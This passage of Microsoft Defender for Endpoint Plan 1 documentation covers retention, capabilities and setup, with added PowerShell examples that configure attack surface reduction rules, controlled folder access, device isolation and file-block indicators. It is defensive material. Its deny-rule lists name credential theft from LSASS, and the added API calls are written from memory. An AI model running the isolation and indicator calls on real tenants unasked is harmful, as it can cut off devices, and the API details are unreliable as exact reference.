personnel, and limits access to applications, systems, and network infrastructure in
proportion to the level of background verification. Operations personnel follow a formal
process when they are required to access a customer's account or related information in
the performance of their duties.

Access to data for services deployed in Microsoft Azure Government data centers is only
granted to operating personnel who have been screened and approved to handle data
that's subject to certain government regulations and requirements, such as FedRAMP,
NIST SP 800-171 (DIB), ITAR, IRS 1075, DoD L4, and CJIS.

Is data shared with other customers?
No. Customer data is isolated from other customers and isn't shared. However, threat
intelligence on the data resulting from Microsoft processing, and which doesn't contain
any customer-specific data, might be shared with other customers. Each customer can
only access data collected from its own organization and generic data that Microsoft
provides.

How long will Microsoft store my data? What is Microsoft's data retention policy?

At service onboarding
Data from Microsoft Defender for Endpoint is retained for 180 days and is visible across
the portal. In the advanced hunting investigation experience, however, it's accessible via
a query for a period of 30 days.

At contract termination or expiration
Your data is kept and remains available to you while the license is in its grace period
or in suspended mode. At the end of this period, that data is erased from Microsoft's
systems to make it unrecoverable, no later than 180 days from contract termination or
expiration.

Advanced Hunting data
Advanced hunting is a query-based threat-hunting tool that lets you explore up to 30
days of raw data.

Can Microsoft help us maintain regulatory compliance?
Microsoft provides customers with detailed information about Microsoft's security and
compliance programs, including audit reports and compliance packages, to help them
assess Defender for Endpoint services against their own legal and regulatory
requirements. Defender for Endpoint has achieved a number of certifications including
ISO, SOC, FedRAMP High, and PCI and continues to pursue additional national, regional,
and industry-specific certifications.

By providing customers with compliant, independently verified services, Microsoft
makes it easier for them to achieve compliance for the infrastructure and applications
they run.

For more information on the Defender for Endpoint certification reports, see the Microsoft
Trust Center.

Want to experience Defender for Endpoint? Sign up for a free trial.

Overview of Microsoft Defender for Endpoint Plan 1
Article • 12/01/2023

Applies to

- Microsoft Defender for Endpoint Plan 1

Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to
help organizations like yours prevent, detect, investigate, and respond to advanced
threats. Defender for Endpoint is available in two plans:

- Defender for Endpoint Plan 1, described in this article; and
- Defender for Endpoint Plan 2, generally available, and formerly known as
Defender for Endpoint.

The green boxes in the following image depict what's included in Defender for Endpoint
Plan 1:

Use this guide to:

- Get an overview of what's included in Defender for Endpoint Plan 1
- Learn how to set up and configure Defender for Endpoint Plan 1
- Get started using the Microsoft Defender portal, where you can view incidents and
alerts, manage devices, and use reports about detected threats
- Get an overview of maintenance and operations

Defender for Endpoint Plan 1 capabilities
Defender for Endpoint Plan 1 includes the following capabilities:

- Next-generation protection that includes industry-leading, robust antimalware
and antivirus protection
- Manual response actions, such as sending a file to quarantine, that your security
team can take on devices or files when threats are detected
- Attack surface reduction capabilities that harden devices, prevent zero-day
attacks, and offer granular control over endpoint access and behaviors
- Centralized configuration and management with the Microsoft Defender portal
and integration with Microsoft Intune
- Protection for a variety of platforms, including Windows, macOS, iOS, and
Android devices

The following sections provide more details about these capabilities.

Next-generation protection
Next-generation protection includes robust antivirus and antimalware protection. With
next-generation protection, you get:

- Behavior-based, heuristic, and real-time antivirus protection
- Cloud-delivered protection, which includes near-instant detection and blocking of
new and emerging threats
- Dedicated protection and product updates, including updates related to Microsoft
Defender Antivirus

To learn more, see Next-generation protection overview.

Manual response actions
Manual response actions are actions that your security team can take when threats are
detected on endpoints or in files. Defender for Endpoint includes certain manual
response actions that can be taken on a device that is detected as potentially
compromised or has suspicious content. You can also run response actions on files that
are detected as threats. The following table summarizes the manual response actions
that are available in Defender for Endpoint Plan 1.

File/Device | Action | Description
Device | Run antivirus scan | Starts an antivirus scan. If any threats are detected on the device, those threats are often addressed during an antivirus scan.
Device | Isolate device | Disconnects a device from your organization's network while retaining connectivity to Defender for Endpoint. This action enables you to monitor the device and take further action if needed.
File | Add an indicator to block or allow a file | Block indicators prevent portable executable files from being read, written, or executed on devices. Allow indicators prevent files from being blocked or remediated.

To learn more, see the following articles:

- Take response actions on devices
- Take response actions on files

Attack surface reduction
Your organization's attack surfaces are all the places where you're vulnerable to
cyberattacks. With Defender for Endpoint Plan 1, you can reduce your attack surfaces by
protecting the devices and applications that your organization uses. The attack surface
reduction capabilities that are included in Defender for Endpoint Plan 1 are described in
the following sections:

- Attack surface reduction rules
- Ransomware mitigation
- Device control
- Web protection
- Network protection
- Network firewall
- Application control

To learn more about attack surface reduction capabilities in Defender for Endpoint, see
Overview of attack surface reduction.
Attack surface reduction rules
Attack surface reduction rules target certain software behaviors that are considered
risky. Such behaviors include:

Launching executable files and scripts that attempt to download or run other files
Running obfuscated or otherwise suspicious scripts
Initiating behaviors that apps don't usually initiate during normal work

Legitimate business applications can exhibit such software behaviors; however, these
behaviors are often considered risky because they are commonly abused by attackers
through malware. Attack surface reduction rules can constrain risky behaviors and help
keep your organization safe.

To learn more, see Use attack surface reduction rules to prevent malware infection.

Ransomware mitigation
With controlled folder access, you get ransomware mitigation. Controlled folder access
allows only trusted apps to access protected folders on your endpoints. Apps are added
to the trusted apps list based on their prevalence and reputation. Your security
operations team can add or remove apps from the trusted apps list, too.

To learn more, see Protect important folders with controlled folder access.
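The following PowerShell is an added example and not code from this article. It puts the two capabilities just described, attack surface reduction rules and controlled folder access, into practice on a single Windows 10/11 device: the rules start in audit mode so that a legitimate app that trips one is logged rather than blocked, controlled folder access is turned on the same way, and the script then reads back what is in effect and the audit/block events Defender wrote. Run it in an elevated session with Microsoft Defender Antivirus active. The rule GUIDs are the published IDs for those rules; the protected folder and allowed application paths are placeholders. If Intune or Group Policy manages these settings, the policy value takes precedence over what you set locally.

```powershell
# Added example (not from the Microsoft article). Requires an elevated session
# on Windows 10/11 with Microsoft Defender Antivirus running.
#Requires -RunAsAdministrator

# Rule name -> GUID (published IDs from the public ASR rule reference)
$asrRules = @{
    'Block all Office applications from creating child processes'        = 'D4F940AB-401B-4EFC-AADC-AD5F3C50688A'
    'Block executable content from email client and webmail'             = 'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550'
    'Block execution of potentially obfuscated scripts'                  = '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC'
    'Block JavaScript or VBScript from launching downloaded executables' = 'D3E037E1-3EB8-44C8-A917-57927947596D'
    'Block credential stealing from LSASS'                               = '9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2'
}

# Start every rule in audit mode: a legitimate app that trips a rule produces
# event 1122 (audited) instead of 1121 (blocked). Switch a rule to Enabled
# once its audit events are clean.
foreach ($id in $asrRules.Values) {
    Add-MpPreference -AttackSurfaceReductionRules_Ids $id `
                     -AttackSurfaceReductionRules_Actions AuditMode
}

# Controlled folder access (ransomware mitigation): audit first, add one
# extra protected folder, and allow one line-of-business app that must write
# there. Both paths are placeholders for this example.
Set-MpPreference -EnableControlledFolderAccess AuditMode
Add-MpPreference -ControlledFolderAccessProtectedFolders 'D:\Finance\Shared'
Add-MpPreference -ControlledFolderAccessAllowedApplications 'C:\Program Files\Contoso\LedgerSync.exe'

# Read back what is actually in effect. Ids and Actions are parallel arrays.
$pref       = Get-MpPreference
$actionName = @{ 0 = 'Disabled'; 1 = 'Enabled'; 2 = 'AuditMode'; 6 = 'Warn' }
$ids        = @($pref.AttackSurfaceReductionRules_Ids)
if ($ids.Count) {
    0..($ids.Count - 1) | ForEach-Object {
        [pscustomobject]@{
            RuleId = $ids[$_]
            Action = $actionName[[int]$pref.AttackSurfaceReductionRules_Actions[$_]]
        }
    } | Format-Table -AutoSize
}
"Controlled folder access mode: $($actionName[[int]$pref.EnableControlledFolderAccess])"

# Events from the last 24 hours in the Defender operational log:
#   1121 ASR blocked   1122 ASR audited
#   1123 CFA blocked   1124 CFA audited
Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 1121, 1122, 1123, 1124
    StartTime = (Get-Date).AddDays(-1)
} -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id,
        @{ n = 'Summary'; e = { ($_.Message -split "`r?`n")[0] } } |
    Format-Table -AutoSize
```

The audit-first sequence is the practical point: 1122 and 1124 events tell you which business apps would have been blocked before you flip a rule or controlled folder access to Enabled, which is where most ASR rollouts go wrong.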

Device control
Sometimes threats to your organization's devices come in the form of files on
removable drives, such as USB drives. Defender for Endpoint includes capabilities to
help prevent threats from unauthorized peripherals from compromising your devices.
You can configure Defender for Endpoint to block or allow removable devices and files
on removable devices.

To learn more, see Control USB devices and removable media.

Web protection
With web protection, you can protect your organization's devices from web threats and
unwanted content. Web protection includes web threat protection and web content
filtering.

- Web threat protection prevents access to phishing sites, malware vectors, exploit
sites, untrusted or low-reputation sites, and sites that you explicitly block.
- Web content filtering prevents access to certain sites based on their category.
Categories can include adult content, leisure sites, legal liability sites, and more.

To learn more, see web protection.

Network protection
With network protection, you can prevent your organization from accessing dangerous
domains that might host phishing scams, exploits, and other malicious content on the
Internet.

To learn more, see Protect your network.

Network firewall
With network firewall protection, you can set rules that determine which network traffic
is permitted to flow to or from your organization's devices. With your network firewall
and the advanced security that you get with Defender for Endpoint, you can:

- Reduce the risk of network security threats
- Safeguard sensitive data and intellectual property
- Extend your security investment

To learn more, see Windows Defender Firewall with advanced security.

Application control
Application control protects your Windows endpoints by running only trusted
applications and code in the system core (kernel). Your security team can define
application control rules that consider an application's attributes, such as its codesigning
certificates, reputation, launching process, and more. Application control is available in
Windows 10 or later.

To learn more, see Application control for Windows.

Centralized management
Defender for Endpoint Plan 1 includes the Microsoft Defender portal, which enables
your security team to view current information about detected threats, take appropriate
actions to mitigate threats, and centrally manage your organization's threat protection
settings.
To learn more, see Microsoft Defender portal overview.

Role-based access control
Using role-based access control (RBAC), your security administrator can create roles and
groups to grant appropriate access to the Microsoft Defender portal
(https://security.microsoft.com). With RBAC, you have fine-grained control over who
can access the Microsoft Defender portal, and what they can see and do.

To learn more, see Manage portal access using role-based access control.

Reporting
The Microsoft Defender portal (https://security.microsoft.com) provides easy access to
information about detected threats and actions to address those threats.

- The Home page includes cards to show at a glance which users or devices are at
risk, how many threats were detected, and what alerts/incidents were created.
- The Incidents & alerts section lists any incidents that were created as a result of
triggered alerts. Alerts and incidents are generated as threats are detected across
devices.
- The Action center lists remediation actions that were taken. For example, if a file is
sent to quarantine, or a URL is blocked, each action is listed in the Action center on
the History tab.
- The Reports section includes reports that show threats detected and their status.

To learn more, see Get started with Microsoft Defender for Endpoint Plan 1.

APIs
With the Defender for Endpoint APIs, you can automate workflows and integrate with
your organization's custom solutions.

To learn more, see Defender for Endpoint APIs.
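The following PowerShell is an added example, not Microsoft's code, showing what "automate workflows" looks like for the Plan 1 manual response actions listed earlier in this article: it isolates a device, starts a full antivirus scan, creates a block indicator for a file hash, and waits for the asynchronous machine actions to finish. It assumes an Entra ID app registration with admin-consented application permissions Machine.Isolate, Machine.Scan, Machine.Read.All and Ti.ReadWrite; the tenant ID, client ID, machine ID and case number are placeholders. The endpoint paths and body fields are taken from the public Defender for Endpoint API reference as I know it, so check them against the current reference before relying on this.

```powershell
# Added example (not Microsoft's code). Placeholders: tenant, client, machine
# ID and the SOC case number. Needs app permissions Machine.Isolate,
# Machine.Scan, Machine.Read.All and Ti.ReadWrite.

$tenantId = '00000000-0000-0000-0000-000000000000'
$clientId = '11111111-1111-1111-1111-111111111111'
$api      = 'https://api.securitycenter.microsoft.com'
$secret   = Read-Host -Prompt 'Client secret' -AsSecureString   # never hard-code it
$plain    = [pscredential]::new('app', $secret).GetNetworkCredential().Password

# 1. Client-credentials token for the MDE API (Entra v2.0 endpoint)
$token = (Invoke-RestMethod -Method Post `
    -Uri "https://login.microsoftonline.com/$tenantId/oauth2/v2.0/token" `
    -Body @{
        grant_type    = 'client_credentials'
        client_id     = $clientId
        client_secret = $plain
        scope         = "$api/.default"
    }).access_token
$headers = @{ Authorization = "Bearer $token"; 'Content-Type' = 'application/json' }

function Invoke-MdeAction {
    param([string]$Path, [hashtable]$Body)
    Invoke-RestMethod -Method Post -Uri "$api/api/$Path" -Headers $headers `
                      -Body ($Body | ConvertTo-Json -Compress)
}

$machineId = '<machine id from the device page or GET /api/machines>'

# 2. Isolate the device. Full cuts all traffic except to the Defender for
#    Endpoint service; Selective keeps Outlook, Teams and Skype for Business.
$iso = Invoke-MdeAction "machines/$machineId/isolate" @{
    Comment = 'SOC-1234: contain suspected credential theft'; IsolationType = 'Full' }

# 3. Run a full antivirus scan on the same device
$scan = Invoke-MdeAction "machines/$machineId/runAntiVirusScan" @{
    Comment = 'SOC-1234: full scan after isolation'; ScanType = 'Full' }

# 4. Block a file tenant-wide by SHA-256 with a custom indicator.
#    The hash is the EICAR test file, so this is safe to try.
$ioc = Invoke-MdeAction 'indicators' @{
    indicatorValue = '275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f'
    indicatorType  = 'FileSha256'
    action         = 'AlertAndBlock'
    title          = 'SOC-1234 dropper'
    description    = 'Dropper observed on the isolated host'
    severity       = 'High'
    expirationTime = (Get-Date).AddDays(30).ToUniversalTime().ToString('o')
}
"Indicator $($ioc.id) created, expires $($ioc.expirationTime)"

# 5. Machine actions are asynchronous: poll until they leave Pending/InProgress
foreach ($action in $iso, $scan) {
    do {
        Start-Sleep -Seconds 15
        $state = Invoke-RestMethod -Uri "$api/api/machineactions/$($action.id)" -Headers $headers
    } until ($state.status -in @('Succeeded', 'Failed', 'Cancelled'))
    '{0} on {1}: {2}' -f $state.type, $state.computerDnsName, $state.status
}
```

Two things worth noting from the calls above: the isolate and scan responses return immediately with a machine action whose status is what tells you the action really landed on the device, and the indicator carries an expiration so a block created during an incident does not linger in the tenant indefinitely.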

Cross-platform support
Most organizations use various devices and operating systems. Defender for Endpoint
Plan 1 supports the following operating systems:

- Windows 10 and 11
- Windows 7 (ESU required) Pro or Enterprise
- Windows 8.1 Pro, Enterprise, and Pro Education
- macOS (the three most recent releases are supported)
- iOS
- Android OS

Servers require an additional license, such as:

- Microsoft Defender for Servers Plan 1 or Plan 2 (recommended for enterprise
customers) as part of the Defender for Cloud offering. To learn more, see Overview
of Microsoft Defender for Servers.
- Microsoft Defender for Endpoint for Servers (recommended for enterprise
customers). To learn more, see Defender for Endpoint onboarding Windows Server.
- Microsoft Defender for Business servers (for small and medium-sized businesses
who have Microsoft Defender for Business). To learn more, see How to get Microsoft
Defender for Business servers.

See Microsoft licensing and product terms.

Next steps
- Set up and configure Defender for Endpoint Plan 1
- Get started with Defender for Endpoint Plan 1
- Manage Defender for Endpoint Plan 1
- Learn about exclusions for Microsoft Defender for Endpoint and Microsoft
Defender Antivirus

Set up and configure Microsoft Defender for Endpoint Plan 1
Article • 09/13/2023

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
This article describes how to set up and configure Defender for Endpoint Plan 1.
Whether you have assistance or are doing it yourself, you can use this article as a guide
throughout your deployment.

The setup and configuration process

The general setup and configuration process for Defender for Endpoint Plan 1 is as
follows:

Number | Step | Description
1 | Review the requirements | Lists licensing, browser, operating system, and datacenter requirements
2 | Plan your deployment | Lists several deployment methods to consider and includes links to more resources to help you decide which method to use
3 | Set up your tenant environment | Lists tasks for setting up your tenant environment
4 | Assign roles and permissions | Lists roles and permissions to consider for your security team. TIP: As soon as roles and permissions are assigned, your security team can get started using the Microsoft Defender portal. To learn more, see Getting started.
5 | Onboard to Defender for Endpoint | Lists several methods by operating system to onboard to Defender for Endpoint Plan 1 and includes links to more detailed information for each method
6 | Configure next-generation protection | Describes how to configure your next-generation protection settings in Microsoft Intune
7 | Configure your attack surface reduction capabilities | Lists the types of attack surface reduction capabilities you can configure and includes procedures with links to more resources

Review the requirements
The following table lists the basic requirements for Defender for Endpoint Plan 1:

Requirement | Description
Licensing requirements | Defender for Endpoint Plan 1 (standalone, or as part of Microsoft 365 E3 or A3)
Browser requirements | Microsoft Edge; Internet Explorer version 11; Google Chrome
Operating systems (client) | Windows 11; Windows 10, version 1709, or later; macOS; iOS; Android OS
Operating systems (server) | Windows Server 2022; Windows Server 2019; Windows Server, version 1803 and later; Windows Server 2016 and 2012 R2 (supported when using the modern unified solution); Linux Server
Datacenter | One of the following datacenter locations: European Union, United Kingdom, United States

Note: The standalone version of Defender for Endpoint Plan 1 doesn't include server
licenses. To onboard servers, you'll require an additional license, such as:

- Microsoft Defender for Servers Plan 1 or Plan 2 (as part of the Defender for
Cloud offering)
- Microsoft Defender for Endpoint for Servers
- Microsoft Defender for Business servers (for small and medium-sized
businesses)

To learn more, see Defender for Endpoint onboarding Windows Server.

Plan your deployment


When you plan your deployment, you can choose from several different architectures
and deployment methods. Every organization is unique, so you have several options to
consider, as listed in the following table:

Intune: Use Intune to manage endpoints in a cloud native environment.

Intune and Configuration Manager: Use Intune and Configuration Manager to manage
endpoints and workloads that span an on-premises and cloud environment.

Configuration Manager: Use Configuration Manager to protect on-premises endpoints
with the cloud-based power of Defender for Endpoint.

Local script downloaded from the Microsoft Defender portal: Use local scripts on
endpoints to run a pilot or onboard just a few devices.

To learn more about your deployment options, see Plan your Defender for Endpoint
deployment. And, download the following poster:

Get the deployment poster

Tip

For more detailed information about planning your deployment, see Plan your
Microsoft Defender for Endpoint deployment.

Set up your tenant environment

Setting up your tenant environment includes tasks, such as:

Verifying your licenses
Configuring your tenant
Configuring your proxy settings (only if necessary)
Making sure sensors are working correctly and reporting data to Defender for
Endpoint

These tasks are included in the setup phase for Defender for Endpoint. See Set up
Defender for Endpoint.

Assign roles and permissions


In order to access the Microsoft Defender portal, configure settings for Defender for
Endpoint, or perform tasks, such as taking response actions on detected threats,
appropriate permissions must be assigned. Defender for Endpoint uses built-in roles
within Microsoft Entra ID.

Microsoft recommends assigning users only the level of permission they need to
perform their tasks. You can assign permissions by using basic permissions
management, or by using role-based access control (RBAC).

With basic permissions management, global admins and security admins have full
access, whereas security readers have read-only access.
With RBAC, you can set more granular permissions through more roles. For
example, you can have security readers, security operators, security admins,
endpoint administrators, and more.

The following table describes key roles to consider for Defender for Endpoint in your
organization:

Global administrators (also referred to as global admins): Global admins can perform
all kinds of tasks. The person who signed up your company for Microsoft 365 or for
Microsoft Defender for Endpoint Plan 1 is a global administrator by default. Global
admins are able to access/change settings across all Microsoft 365 portals, such as:
- The Microsoft 365 admin center (https://admin.microsoft.com )
- Microsoft Defender portal (https://security.microsoft.com )
- Intune admin center (https://endpoint.microsoft.com )
As a best practice, limit the number of global administrators.

Security administrators (also referred to as security admins): Security admins can
perform security operator tasks plus the following tasks:
- Monitor security-related policies
- Manage security threats and alerts
- View reports

Security operator: Security operators can perform security reader tasks plus the
following tasks:
- View information about detected threats
- Investigate and respond to detected threats

Security reader: Security readers can perform the following tasks:
- View security-related policies across Microsoft 365 services
- View security threats and alerts
- View reports

Tip

To learn more about roles in Microsoft Entra ID, see Assign administrator and
non-administrator roles to users with Microsoft Entra ID. For more information about
roles for Defender for Endpoint, see Role-based access control.
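The guidance above is to limit the number of global administrators and to give each user only the role they need. The following script is an added example, not part of the Microsoft documentation, that reports who holds each of the roles listed in the table so that an over-privileged tenant can be spotted before onboarding begins. It assumes the Microsoft Graph PowerShell SDK is installed, that the signed-in account can read directory roles, and a threshold of five global administrators, which is an assumed value rather than a Microsoft recommendation.

```powershell
# Added example (not from the Microsoft documentation): list the members of the
# Microsoft Entra ID roles described above and flag a Global Administrator count
# above an assumed threshold. Requires the Microsoft Graph PowerShell SDK.
Connect-MgGraph -Scopes 'RoleManagement.Read.Directory', 'Directory.Read.All'

function Get-PrivilegedRoleReport {
    param(
        # Built-in Microsoft Entra ID role display names from the table above.
        [string[]] $RoleNames = @('Global Administrator', 'Security Administrator',
                                  'Security Operator', 'Security Reader'),
        # Assumed threshold; adjust to your organization's policy.
        [int] $MaxGlobalAdmins = 5
    )

    # A directoryRole object exists only once the role has been activated in the tenant,
    # so a role with no object simply has no members yet.
    $activeRoles = Get-MgDirectoryRole -All

    foreach ($name in $RoleNames) {
        $role = $activeRoles | Where-Object { $_.DisplayName -eq $name }
        if (-not $role) {
            [pscustomobject]@{ Role = $name; Members = 0; Accounts = @(); Flag = 'role not activated' }
            continue
        }

        $members = @(Get-MgDirectoryRoleMember -DirectoryRoleId $role.Id -All)
        # Members are returned as generic directory objects; the UPN lives in AdditionalProperties.
        $accounts = $members | ForEach-Object { $_.AdditionalProperties['userPrincipalName'] } |
                    Where-Object { $_ }

        $flag = ''
        if ($name -eq 'Global Administrator' -and $members.Count -gt $MaxGlobalAdmins) {
            $flag = "exceeds $MaxGlobalAdmins global admins; move day-to-day work to security admin/operator roles"
        }

        [pscustomobject]@{ Role = $name; Members = $members.Count; Accounts = $accounts; Flag = $flag }
    }
}

Get-PrivilegedRoleReport | Format-Table Role, Members, Flag -AutoSize
```

Run it again after assigning roles to confirm that security-team accounts landed in the security reader, security operator, or security admin role rather than in the global administrator role.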

Onboard to Defender for Endpoint


When you're ready to onboard your organization's endpoints, you can choose from
several methods, as listed in the following table:

Windows: Local script (up to 10 devices); Group Policy; Microsoft Intune/Mobile
Device Manager; Microsoft Endpoint Configuration Manager; VDI scripts

macOS: Local script; Microsoft Intune; JAMF Pro; Mobile Device Management

Android: Microsoft Intune

iOS: Microsoft Intune; Mobile Application Manager

Then, proceed to configure your next-generation protection and attack surface
reduction capabilities.

Configure next-generation protection


We recommend using Intune to manage your organization's devices and security
settings, as shown in the following image:

To configure your next-generation protection in Intune, follow these steps:

1. Go to the Intune admin center (https://endpoint.microsoft.com ) and sign in.

2. Select Endpoint security > Antivirus, and then select an existing policy. (If you
don't have an existing policy, create a new policy.)

3. Set or change your antivirus configuration settings. Need help? Refer to the
following resources:

Settings for Windows 10 Microsoft Defender Antivirus policy in Microsoft
Intune
Configure Defender for Endpoint on iOS features

4. When you're finished specifying your settings, choose Review + save.
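Once the antivirus policy is assigned, the settings it carries should show up on each device. The following check is an added example, not part of the Microsoft documentation, that reads the effective next-generation protection state on a Windows device with the built-in Defender module and reports which expected conditions hold. The set of conditions and the two-day signature age limit are assumptions chosen for illustration; run it in an elevated PowerShell session on an onboarded device.

```powershell
# Added example (not from the Microsoft documentation): confirm on a device that the
# next-generation protection settings an Intune antivirus policy is meant to enforce
# actually took effect. Uses the built-in Defender module (Get-MpComputerStatus,
# Get-MpPreference). The list of checks is an assumed baseline.
function Test-NgpState {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference

    # Each entry: condition a protected device should satisfy.
    $checks = [ordered]@{
        'Antimalware service running'  = [bool]$status.AMServiceEnabled
        'Real-time protection on'      = [bool]$status.RealTimeProtectionEnabled
        'Behavior monitoring on'       = [bool]$status.BehaviorMonitorEnabled
        'Downloads/attachments scanned' = [bool]$status.IoavProtectionEnabled
        'Active mode (not passive)'    = ($status.AMRunningMode -eq 'Normal')
        'Tamper protection on'         = [bool]$status.IsTamperProtected
        'Cloud protection (MAPS) on'   = ($pref.MAPSReporting -ne 0)   # 0 = disabled
        'Signatures under 2 days old'  = ($status.AntivirusSignatureAge -le 1)
    }

    foreach ($name in $checks.Keys) {
        [pscustomobject]@{
            Check  = $name
            Result = if ($checks[$name]) { 'PASS' } else { 'FAIL' }
        }
    }
}

$report = Test-NgpState
$report | Format-Table -AutoSize

# A device in passive mode or with tamper protection off is the usual sign that the
# policy did not apply (or that another product registered as the primary antivirus).
$failed = @($report | Where-Object Result -eq 'FAIL')
if ($failed.Count -gt 0) { Write-Warning "$($failed.Count) next-generation protection check(s) failed on $env:COMPUTERNAME" }
```

A device showing AMRunningMode other than Normal is worth investigating first, because every other protection setting is ineffective while Defender Antivirus is running in passive mode behind a third-party product.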

Configure your attack surface reduction capabilities

Attack surface reduction is all about reducing the places and ways your organization is
open to attack. Defender for Endpoint Plan 1 includes several features and capabilities
to help you reduce your attack surfaces across your endpoints. These features and
capabilities are listed in the following table:

Attack surface reduction rules: Configure attack surface reduction rules to constrain
software-based risky behaviors and help keep your organization safe. Attack surface
reduction rules target certain software behaviors, such as:
- Launching executable files and scripts that attempt to download or run files
- Running obfuscated or otherwise suspicious scripts
- Performing behaviors that apps don't usually initiate during normal day-to-day work
Such software behaviors are sometimes seen in legitimate applications. However, these
behaviors are often considered risky because they're commonly abused by attackers
through malware.

Ransomware mitigation: Set up ransomware mitigation by configuring controlled folder
access, which helps protect your organization's valuable data from malicious apps and
threats, such as ransomware.

Device control: Configure device control settings for your organization to allow or
block removable devices (such as USB drives).

Network protection: Set up network protection to prevent people in your organization
from using applications that access dangerous domains or malicious content on the
Internet.

Web protection: Set up web threat protection to protect your organization's devices
from phishing sites, exploit sites, and other untrusted or low-reputation sites. Set up
web content filtering to track and regulate access to websites based on their content
categories (such as Leisure, High bandwidth, Adult content, or Legal liability).

Network firewall: Configure your network firewall with rules that determine which
network traffic is permitted to come into or go out from your organization's devices.

Application control: Configure application control rules if you want to allow only
trusted applications and processes to run on your Windows devices.

Attack surface reduction rules

Attack surface reduction rules are available on devices running Windows. We
recommend using Intune, as shown in the following image:

1. Go to the Intune admin center (https://endpoint.microsoft.com ) and sign in.

2. Choose Endpoint security > Attack surface reduction > + Create policy.

3. For Platform, select Windows 10 and later.

4. For Profile, select Attack surface reduction rules, and then choose Create.

5. On the Basics tab, specify a name and description for the policy, and then choose
Next.

6. On the Configuration settings tab, expand Attack Surface Reduction Rules.

7. Specify settings for each rule, and then choose Next. (For more information about
what each rule does, see Attack surface reduction rules.)

8. On the Scope tags tab, if your organization is using scope tags, choose + Select
scope tags, and then select the tags you want to use. Then, choose Next.
To learn more about scope tags, see Use role-based access control (RBAC) and
scope tags for distributed IT.

9. On the Assignments tab, specify the users and groups to whom your policy should
be applied, and then choose Next. (To learn more about assignments, see Assign
user and device profiles in Microsoft Intune.)

10. On the Review + create tab, review the settings, and then choose Create.

Tip

To learn more about attack surface reduction rules, see the following resources:

Use attack surface reduction rules to prevent malware infection
View the list of attack surface reduction rules
Attack surface reduction rules deployment Step 3: Implement attack surface
reduction rules
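The Intune profile above is the recommended way to roll rules out at scale. For a pilot device, or to check what a device actually received after the profile was assigned, the same rules can be set and read back with the built-in Defender module. The following script is an added example, not part of the Microsoft documentation. It uses three published rule GUIDs (verify them against the attack surface reduction rules reference before use), starts each rule in audit mode, and compares the desired actions with what Get-MpPreference reports. The desired-state table is an assumption for illustration; run it elevated on a Windows device.

```powershell
# Added example (not from the Microsoft documentation): apply attack surface reduction
# rules with the Defender module and verify that the device reports the intended action
# for each rule. Rule GUIDs are the published identifiers; check them against the
# "Attack surface reduction rules reference" before use.

# Desired state (assumed for this example): audit first, promote to Enabled after review.
$DesiredRules = @{
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'AuditMode'  # Block all Office applications from creating child processes
    'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' = 'AuditMode'  # Block executable content from email client and webmail
    '9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2' = 'AuditMode'  # Block credential stealing from LSASS
}

function Set-AsrRules {
    param([hashtable] $Rules)
    # Add-MpPreference merges with rules already configured; a rule that is already
    # present gets its action updated rather than duplicated.
    foreach ($id in $Rules.Keys) {
        Add-MpPreference -AttackSurfaceReductionRules_Ids $id `
                         -AttackSurfaceReductionRules_Actions $Rules[$id]
    }
}

function Test-AsrRules {
    param([hashtable] $Rules)
    $pref = Get-MpPreference
    # Ids and Actions are parallel arrays: Ids[i] is configured with Actions[i].
    # Action codes: 0 Disabled, 1 Enabled, 2 AuditMode, 6 Warn.
    $actionName = @{ 0 = 'Disabled'; 1 = 'Enabled'; 2 = 'AuditMode'; 6 = 'Warn' }
    $applied = @{}
    for ($i = 0; $i -lt @($pref.AttackSurfaceReductionRules_Ids).Count; $i++) {
        $id = ([string]$pref.AttackSurfaceReductionRules_Ids[$i]).ToUpper()
        $applied[$id] = $actionName[[int]$pref.AttackSurfaceReductionRules_Actions[$i]]
    }

    foreach ($id in $Rules.Keys) {
        $actual = if ($applied.ContainsKey($id)) { $applied[$id] } else { 'not set' }
        [pscustomobject]@{
            RuleId   = $id
            Expected = $Rules[$id]
            Actual   = $actual
            Match    = ($actual -eq $Rules[$id])
        }
    }
}

Set-AsrRules -Rules $DesiredRules
Test-AsrRules -Rules $DesiredRules | Format-Table -AutoSize
```

A rule that reads back as "not set" or with a different action after the Intune profile has been assigned usually means the device has not yet synced or that a Group Policy or another profile is overriding the setting; Get-MpPreference shows the effective value regardless of which channel set it.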

Ransomware mitigation

You get ransomware mitigation through controlled folder access, which allows only
trusted apps to access protected folders on your endpoints.

We recommend using Intune to configure controlled folder access.

1. Go to the Intune admin center (https://endpoint.microsoft.com ) and sign in.

2. Select Endpoint Security, and then select Attack Surface Reduction.

3. Choose + Create Policy.

4. For Platform, select Windows 10 and later, and for Profile, select Attack surface
reduction rules. Then choose Create.

5. On the Basics tab, name the policy and add a description. Select Next.

6. On the Configuration settings tab, in the Attack Surface Reduction Rules section,
scroll down to the bottom. In the Enable folder protection drop-down, select
Enable. You can optionally specify these other settings:

Next to List of additional folders that need to be protected, select the drop-
down menu, and then add folders that need to be protected.
Next to List of apps that have access to protected folders, select the drop-
down menu, and then add apps that should have access to protected folders.
Next to Exclude files and paths from attack surface reduction rules, select
the drop-down menu, and then add the files and paths that need to be
excluded from attack surface reduction rules.

Then choose Next.

7. On the Scope tags tab, if your organization is using scope tags, choose + Select
scope tags, and then select the tags you want to use. Then, choose Next.

To learn more about scope tags, see Use role-based access control (RBAC) and
scope tags for distributed IT.

8. On the Assignments tab, select Add all users and + Add all devices, and then
choose Next. (You can alternately specify specific groups of users or devices.)

9. On the Review + create tab, review the settings for your policy, and then choose
Create. The policy will be applied to any endpoints that were onboarded to
Defender for Endpoint shortly.
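The three optional settings in step 6 (additional protected folders, apps allowed to reach protected folders, and exclusions) map directly onto Defender module cmdlets, which is convenient for piloting on a handful of devices before the Intune policy goes wide. The following script is an added example, not part of the Microsoft documentation. The folder and application paths are constructed placeholders; replace them with your own. Run it elevated on a Windows device.

```powershell
# Added example (not from the Microsoft documentation): configure controlled folder
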